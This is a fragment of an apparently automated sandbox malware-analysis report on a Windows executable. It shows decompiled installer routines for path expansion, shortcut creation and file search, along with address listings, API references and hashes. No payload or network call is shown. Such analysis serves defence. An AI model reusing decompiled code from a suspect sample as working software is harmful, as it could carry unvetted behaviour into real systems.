                                                                                            • SetWindowTextA.USER32(?,?), ref: 004042EE
                                                                                            • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                                                                                            • lstrcmpiA.KERNEL32(jwcvvjog,00420498,00000000,?,?), ref: 004043E0
                                                                                            • lstrcatA.KERNEL32(?,jwcvvjog), ref: 004043EC
                                                                                            • SetDlgItemTextA.USER32 ref: 004043FC
                                                                                              • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                                                                                              • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                                                                                              • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                                                                                              • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                                                                                              • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                                                                                            • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                                                                                            • SetDlgItemTextA.USER32 ref: 00404549
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$jwcvvjog
                                                                                            • API String ID: 2246997448-3511593884
                                                                                            • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                                                                                            • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                                                                                            • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                                                                                            • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 74%
                                                                                            			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                            				signed int _v8;
                                                                                            				struct _ITEMIDLIST* _v12;
                                                                                            				signed int _v16;
                                                                                            				signed char _v20;
                                                                                            				signed char _v24;
                                                                                            				signed int _v28;
                                                                                            				signed int _t36;
                                                                                            				CHAR* _t37;
                                                                                            				signed char _t39;
                                                                                            				signed int _t40;
                                                                                            				int _t41;
                                                                                            				char _t51;
                                                                                            				char _t52;
                                                                                            				char _t54;
                                                                                            				char _t56;
                                                                                            				void* _t64;
                                                                                            				signed int _t68;
                                                                                            				signed int _t73;
                                                                                            				signed char _t74;
                                                                                            				char _t81;
                                                                                            				void* _t83;
                                                                                            				CHAR* _t84;
                                                                                            				void* _t86;
                                                                                            				signed int _t93;
                                                                                            				signed int _t95;
                                                                                            				void* _t96;
                                                                                            
                                                                                            				_t86 = __esi;
                                                                                            				_t83 = __edi;
                                                                                            				_t64 = __ebx;
                                                                                            				_t36 = _a8;
                                                                                            				if(_t36 < 0) {
                                                                                            					_t36 =  *( *0x42367c - 4 + _t36 * 4);
                                                                                            				}
                                                                                            				_t73 =  *0x423ed8 + _t36;
                                                                                            				_t37 = 0x422e40;
                                                                                            				_push(_t64);
                                                                                            				_push(_t86);
                                                                                            				_push(_t83);
                                                                                            				_t84 = 0x422e40;
                                                                                            				if(_a4 - 0x422e40 < 0x800) {
                                                                                            					_t84 = _a4;
                                                                                            					_a4 = _a4 & 0x00000000;
                                                                                            				}
                                                                                            				while(1) {
                                                                                            					_t81 =  *_t73;
                                                                                            					if(_t81 == 0) {
                                                                                            						break;
                                                                                            					}
                                                                                            					__eflags = _t84 - _t37 - 0x400;
                                                                                            					if(_t84 - _t37 >= 0x400) {
                                                                                            						break;
                                                                                            					}
                                                                                            					_t73 = _t73 + 1;
                                                                                            					__eflags = _t81 - 0xfc;
                                                                                            					_a8 = _t73;
                                                                                            					if(__eflags <= 0) {
                                                                                            						if(__eflags != 0) {
                                                                                            							 *_t84 = _t81;
                                                                                            							_t84 =  &(_t84[1]);
                                                                                            							__eflags = _t84;
                                                                                            						} else {
                                                                                            							 *_t84 =  *_t73;
                                                                                            							_t84 =  &(_t84[1]);
                                                                                            							_t73 = _t73 + 1;
                                                                                            						}
                                                                                            						continue;
                                                                                            					}
                                                                                            					_t39 =  *(_t73 + 1);
                                                                                            					_t74 =  *_t73;
                                                                                            					_a8 = _a8 + 2;
                                                                                            					_v20 = _t39;
                                                                                            					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                                                                                            					_t68 = _t74;
                                                                                            					_t40 = _t39 | 0x00000080;
                                                                                            					__eflags = _t81 - 0xfe;
                                                                                            					_v28 = _t68;
                                                                                            					_v24 = _t74 | 0x00000080;
                                                                                            					_v16 = _t40;
                                                                                            					if(_t81 != 0xfe) {
                                                                                            						__eflags = _t81 - 0xfd;
                                                                                            						if(_t81 != 0xfd) {
                                                                                            							__eflags = _t81 - 0xff;
                                                                                            							if(_t81 == 0xff) {
                                                                                            								__eflags = (_t40 | 0xffffffff) - _t93;
                                                                                            								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                                                                                            							}
                                                                                            							L41:
                                                                                            							_t41 = lstrlenA(_t84);
                                                                                            							_t73 = _a8;
                                                                                            							_t84 =  &(_t84[_t41]);
                                                                                            							_t37 = 0x422e40;
                                                                                            							continue;
                                                                                            						}
                                                                                            						__eflags = _t93 - 0x1d;
                                                                                            						if(_t93 != 0x1d) {
                                                                                            							__eflags = (_t93 << 0xa) + 0x424000;
                                                                                            							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                                                                                            						} else {
                                                                                            							E004059E3(_t84,  *0x423ea8);
                                                                                            						}
                                                                                            						__eflags = _t93 + 0xffffffeb - 7;
                                                                                            						if(_t93 + 0xffffffeb < 7) {
                                                                                            							L32:
                                                                                            							E00405CE3(_t84);
                                                                                            						}
                                                                                            						goto L41;
                                                                                            					}
                                                                                            					_t95 = 2;
                                                                                            					_t51 = GetVersion();
                                                                                            					__eflags = _t51;
                                                                                            					if(_t51 >= 0) {
                                                                                            						L12:
                                                                                            						_v8 = 1;
                                                                                            						L13:
                                                                                            						__eflags =  *0x423f24;
                                                                                            						if( *0x423f24 != 0) {
                                                                                            							_t95 = 4;
                                                                                            						}
                                                                                            						__eflags = _t68;
                                                                                            						if(_t68 >= 0) {
                                                                                            							__eflags = _t68 - 0x25;
                                                                                            							if(_t68 != 0x25) {
                                                                                            								__eflags = _t68 - 0x24;
                                                                                            								if(_t68 == 0x24) {
                                                                                            									GetWindowsDirectoryA(_t84, 0x400);
                                                                                            									_t95 = 0;
                                                                                            								}
                                                                                            								while(1) {
                                                                                            									__eflags = _t95;
                                                                                            									if(_t95 == 0) {
                                                                                            										goto L29;
                                                                                            									}
                                                                                            									_t52 =  *0x423ea4;
                                                                                            									_t95 = _t95 - 1;
                                                                                            									__eflags = _t52;
                                                                                            									if(_t52 == 0) {
                                                                                            										L25:
                                                                                            										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                                                                                            										__eflags = _t54;
                                                                                            										if(_t54 != 0) {
                                                                                            											L27:
                                                                                            											 *_t84 =  *_t84 & 0x00000000;
                                                                                            											__eflags =  *_t84;
                                                                                            											continue;
                                                                                            										}
                                                                                            										__imp__SHGetPathFromIDListA(_v12, _t84);
                                                                                            										__imp__CoTaskMemFree(_v12);
                                                                                            										__eflags = _t54;
                                                                                            										if(_t54 != 0) {
                                                                                            											goto L29;
                                                                                            										}
                                                                                            										goto L27;
                                                                                            									}
                                                                                            									__eflags = _v8;
                                                                                            									if(_v8 == 0) {
                                                                                            										goto L25;
                                                                                            									}
                                                                                            									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                                                                                            									__eflags = _t56;
                                                                                            									if(_t56 == 0) {
                                                                                            										goto L29;
                                                                                            									}
                                                                                            									goto L25;
                                                                                            								}
                                                                                            								goto L29;
                                                                                            							}
                                                                                            							GetSystemDirectoryA(_t84, 0x400);
                                                                                            							goto L29;
                                                                                            						} else {
                                                                                            							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                                                                                            							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                                                                                            							__eflags =  *_t84;
                                                                                            							if( *_t84 != 0) {
                                                                                            								L30:
                                                                                            								__eflags = _v20 - 0x1a;
                                                                                            								if(_v20 == 0x1a) {
                                                                                            									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                            								}
                                                                                            								goto L32;
                                                                                            							}
                                                                                            							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                                                                                            							L29:
                                                                                            							__eflags =  *_t84;
                                                                                            							if( *_t84 == 0) {
                                                                                            								goto L32;
                                                                                            							}
                                                                                            							goto L30;
                                                                                            						}
                                                                                            					}
                                                                                            					__eflags = _t51 - 0x5a04;
                                                                                            					if(_t51 == 0x5a04) {
                                                                                            						goto L12;
                                                                                            					}
                                                                                            					__eflags = _v20 - 0x23;
                                                                                            					if(_v20 == 0x23) {
                                                                                            						goto L12;
                                                                                            					}
                                                                                            					__eflags = _v20 - 0x2e;
                                                                                            					if(_v20 == 0x2e) {
                                                                                            						goto L12;
                                                                                            					} else {
                                                                                            						_v8 = _v8 & 0x00000000;
                                                                                            						goto L13;
                                                                                            					}
                                                                                            				}
                                                                                            				 *_t84 =  *_t84 & 0x00000000;
                                                                                            				if(_a4 == 0) {
                                                                                            					return _t37;
                                                                                            				}
                                                                                            				return E00405A85(_a4, _t37);
                                                                                            			}





























                                                                                            0x00405aa7
                                                                                            0x00405aa7
                                                                                            0x00405aa7
                                                                                            0x00405aad
                                                                                            0x00405ab2
                                                                                            0x00405ac3
                                                                                            0x00405ac3
                                                                                            0x00405ace
                                                                                            0x00405ad0
                                                                                            0x00405ad5
                                                                                            0x00405ad8
                                                                                            0x00405ad9
                                                                                            0x00405ae0
                                                                                            0x00405ae2
                                                                                            0x00405ae8
                                                                                            0x00405aeb
                                                                                            0x00405aeb
                                                                                            0x00405cc0
                                                                                            0x00405cc0
                                                                                            0x00405cc4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405af8
                                                                                            0x00405afe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405b04
                                                                                            0x00405b05
                                                                                            0x00405b08
                                                                                            0x00405b0b
                                                                                            0x00405cb3
                                                                                            0x00405cbd
                                                                                            0x00405cbf
                                                                                            0x00405cbf
                                                                                            0x00405cb5
                                                                                            0x00405cb7
                                                                                            0x00405cb9
                                                                                            0x00405cba
                                                                                            0x00405cba
                                                                                            0x00000000
                                                                                            0x00405cb3
                                                                                            0x00405b11
                                                                                            0x00405b15
                                                                                            0x00405b1a
                                                                                            0x00405b29
                                                                                            0x00405b2c
                                                                                            0x00405b2e
                                                                                            0x00405b33
                                                                                            0x00405b36
                                                                                            0x00405b39
                                                                                            0x00405b3c
                                                                                            0x00405b3f
                                                                                            0x00405b42
                                                                                            0x00405c5d
                                                                                            0x00405c60
                                                                                            0x00405c90
                                                                                            0x00405c93
                                                                                            0x00405c98
                                                                                            0x00405c9c
                                                                                            0x00405c9c
                                                                                            0x00405ca1
                                                                                            0x00405ca2
                                                                                            0x00405ca7
                                                                                            0x00405caa
                                                                                            0x00405cac
                                                                                            0x00000000
                                                                                            0x00405cac
                                                                                            0x00405c62
                                                                                            0x00405c65
                                                                                            0x00405c7a
                                                                                            0x00405c81
                                                                                            0x00405c67
                                                                                            0x00405c6e
                                                                                            0x00405c6e
                                                                                            0x00405c89
                                                                                            0x00405c8c
                                                                                            0x00405c55
                                                                                            0x00405c56
                                                                                            0x00405c56
                                                                                            0x00000000
                                                                                            0x00405c8c
                                                                                            0x00405b4a
                                                                                            0x00405b4b
                                                                                            0x00405b51
                                                                                            0x00405b53
                                                                                            0x00405b6d
                                                                                            0x00405b6d
                                                                                            0x00405b74
                                                                                            0x00405b74
                                                                                            0x00405b7b
                                                                                            0x00405b7f
                                                                                            0x00405b7f
                                                                                            0x00405b80
                                                                                            0x00405b82
                                                                                            0x00405bbb
                                                                                            0x00405bbe
                                                                                            0x00405bce
                                                                                            0x00405bd1
                                                                                            0x00405bd9
                                                                                            0x00405bdf
                                                                                            0x00405bdf
                                                                                            0x00405c3b
                                                                                            0x00405c3b
                                                                                            0x00405c3d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405be3
                                                                                            0x00405bea
                                                                                            0x00405beb
                                                                                            0x00405bed
                                                                                            0x00405c07
                                                                                            0x00405c15
                                                                                            0x00405c1b
                                                                                            0x00405c1d
                                                                                            0x00405c38
                                                                                            0x00405c38
                                                                                            0x00405c38
                                                                                            0x00000000
                                                                                            0x00405c38
                                                                                            0x00405c23
                                                                                            0x00405c2e
                                                                                            0x00405c34
                                                                                            0x00405c36
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c36
                                                                                            0x00405bef
                                                                                            0x00405bf2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c01
                                                                                            0x00405c03
                                                                                            0x00405c05
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c05
                                                                                            0x00000000
                                                                                            0x00405c3b
                                                                                            0x00405bc6
                                                                                            0x00000000
                                                                                            0x00405b84
                                                                                            0x00405b89
                                                                                            0x00405b9f
                                                                                            0x00405ba4
                                                                                            0x00405ba7
                                                                                            0x00405c44
                                                                                            0x00405c44
                                                                                            0x00405c48
                                                                                            0x00405c50
                                                                                            0x00405c50
                                                                                            0x00000000
                                                                                            0x00405c48
                                                                                            0x00405bb1
                                                                                            0x00405c3f
                                                                                            0x00405c3f
                                                                                            0x00405c42
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c42
                                                                                            0x00405b82
                                                                                            0x00405b55
                                                                                            0x00405b59
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405b5b
                                                                                            0x00405b5f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405b61
                                                                                            0x00405b65
                                                                                            0x00000000
                                                                                            0x00405b67
                                                                                            0x00405b67
                                                                                            0x00000000
                                                                                            0x00405b67
                                                                                            0x00405b65
                                                                                            0x00405cca
                                                                                            0x00405cd4
                                                                                            0x00405ce0
                                                                                            0x00405ce0
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                                                                                            • GetSystemDirectoryA.KERNEL32(jwcvvjog,00000400), ref: 00405BC6
                                                                                            • GetWindowsDirectoryA.KERNEL32(jwcvvjog,00000400), ref: 00405BD9
                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                                                                                            • SHGetPathFromIDListA.SHELL32(00000000,jwcvvjog), ref: 00405C23
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                                                                                            • lstrcatA.KERNEL32(jwcvvjog,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                                                                                            • lstrlenA.KERNEL32(jwcvvjog,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$jwcvvjog
                                                                                            • API String ID: 900638850-3127548644
                                                                                            • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                                                                                            • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                                                                                            • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                                                                                            • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 74%
                                                                                            			E00402012() {
                                                                                            				void* _t44;
                                                                                            				intOrPtr* _t48;
                                                                                            				intOrPtr* _t50;
                                                                                            				intOrPtr* _t52;
                                                                                            				intOrPtr* _t54;
                                                                                            				signed int _t58;
                                                                                            				intOrPtr* _t59;
                                                                                            				intOrPtr* _t62;
                                                                                            				intOrPtr* _t64;
                                                                                            				intOrPtr* _t66;
                                                                                            				intOrPtr* _t69;
                                                                                            				intOrPtr* _t71;
                                                                                            				int _t75;
                                                                                            				signed int _t81;
                                                                                            				intOrPtr* _t88;
                                                                                            				void* _t95;
                                                                                            				void* _t96;
                                                                                            				void* _t100;
                                                                                            
                                                                                            				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                                                                                            				_t96 = E004029E8(0xffffffdf);
                                                                                            				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                                                                                            				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                                                                                            				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                                                                                            				if(E004055E5(_t96) == 0) {
                                                                                            					E004029E8(0x21);
                                                                                            				}
                                                                                            				_t44 = _t100 + 8;
                                                                                            				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                                                                                            				if(_t44 < _t75) {
                                                                                            					L13:
                                                                                            					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                                            					_push(0xfffffff0);
                                                                                            				} else {
                                                                                            					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                                            					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                                                                                            					if(_t95 >= _t75) {
                                                                                            						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                                            						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                                            						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                                            						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                                            						_t81 =  *(_t100 - 0x14);
                                                                                            						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                                            						if(_t58 != 0) {
                                                                                            							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                                            							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                                            							_t81 =  *(_t100 - 0x14);
                                                                                            						}
                                                                                            						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                                            						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                                                                            							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                                            							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                                                                            						}
                                                                                            						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                                            						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                                            						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                                            						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                                            						if(_t95 >= _t75) {
                                                                                            							_t95 = 0x80004005;
                                                                                            							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                                                                                            								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                            								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                                                                                            							}
                                                                                            						}
                                                                                            						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                            						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                            					}
                                                                                            					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                                            					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                                            					if(_t95 >= _t75) {
                                                                                            						_push(0xfffffff4);
                                                                                            					} else {
                                                                                            						goto L13;
                                                                                            					}
                                                                                            				}
                                                                                            				E00401423();
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                                                                                            				return 0;
                                                                                            			}





















                                                                                            0x0040201b
                                                                                            0x00402025
                                                                                            0x0040202e
                                                                                            0x00402038
                                                                                            0x00402041
                                                                                            0x0040204b
                                                                                            0x0040204f
                                                                                            0x0040204f
                                                                                            0x00402054
                                                                                            0x00402065
                                                                                            0x0040206d
                                                                                            0x0040214d
                                                                                            0x0040214d
                                                                                            0x00402154
                                                                                            0x00402073
                                                                                            0x00402073
                                                                                            0x00402084
                                                                                            0x00402088
                                                                                            0x0040208e
                                                                                            0x00402098
                                                                                            0x0040209a
                                                                                            0x004020a5
                                                                                            0x004020a8
                                                                                            0x004020b5
                                                                                            0x004020b7
                                                                                            0x004020b9
                                                                                            0x004020c0
                                                                                            0x004020c3
                                                                                            0x004020c3
                                                                                            0x004020c6
                                                                                            0x004020d0
                                                                                            0x004020d8
                                                                                            0x004020dd
                                                                                            0x004020e9
                                                                                            0x004020e9
                                                                                            0x004020ec
                                                                                            0x004020f5
                                                                                            0x004020f8
                                                                                            0x00402101
                                                                                            0x00402106
                                                                                            0x00402118
                                                                                            0x00402127
                                                                                            0x00402129
                                                                                            0x00402135
                                                                                            0x00402135
                                                                                            0x00402127
                                                                                            0x00402137
                                                                                            0x0040213d
                                                                                            0x0040213d
                                                                                            0x00402140
                                                                                            0x00402146
                                                                                            0x0040214b
                                                                                            0x00402160
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040214b
                                                                                            0x00402156
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 123533781-47812868
                                                                                            • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                                                                                            • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                                                                                            • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                                                                                            • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 39%
                                                                                            			E00402630(char __ebx, char* __edi, char* __esi) {
                                                                                            				void* _t19;
                                                                                            
                                                                                            				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                                            					E004059E3(__edi, _t6);
                                                                                            					_push(_t19 - 0x178);
                                                                                            					_push(__esi);
                                                                                            					E00405A85();
                                                                                            				} else {
                                                                                            					 *__edi = __ebx;
                                                                                            					 *__esi = __ebx;
                                                                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                            				}
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                                                                                            				return 0;
                                                                                            			}




                                                                                            0x00402648
                                                                                            0x0040265c
                                                                                            0x00402667
                                                                                            0x00402668
                                                                                            0x004027a3
                                                                                            0x0040264a
                                                                                            0x0040264a
                                                                                            0x0040264c
                                                                                            0x0040264e
                                                                                            0x0040264e
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                                                                                            • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                                                                                            • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                                                                                            • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666477775.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_19e000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
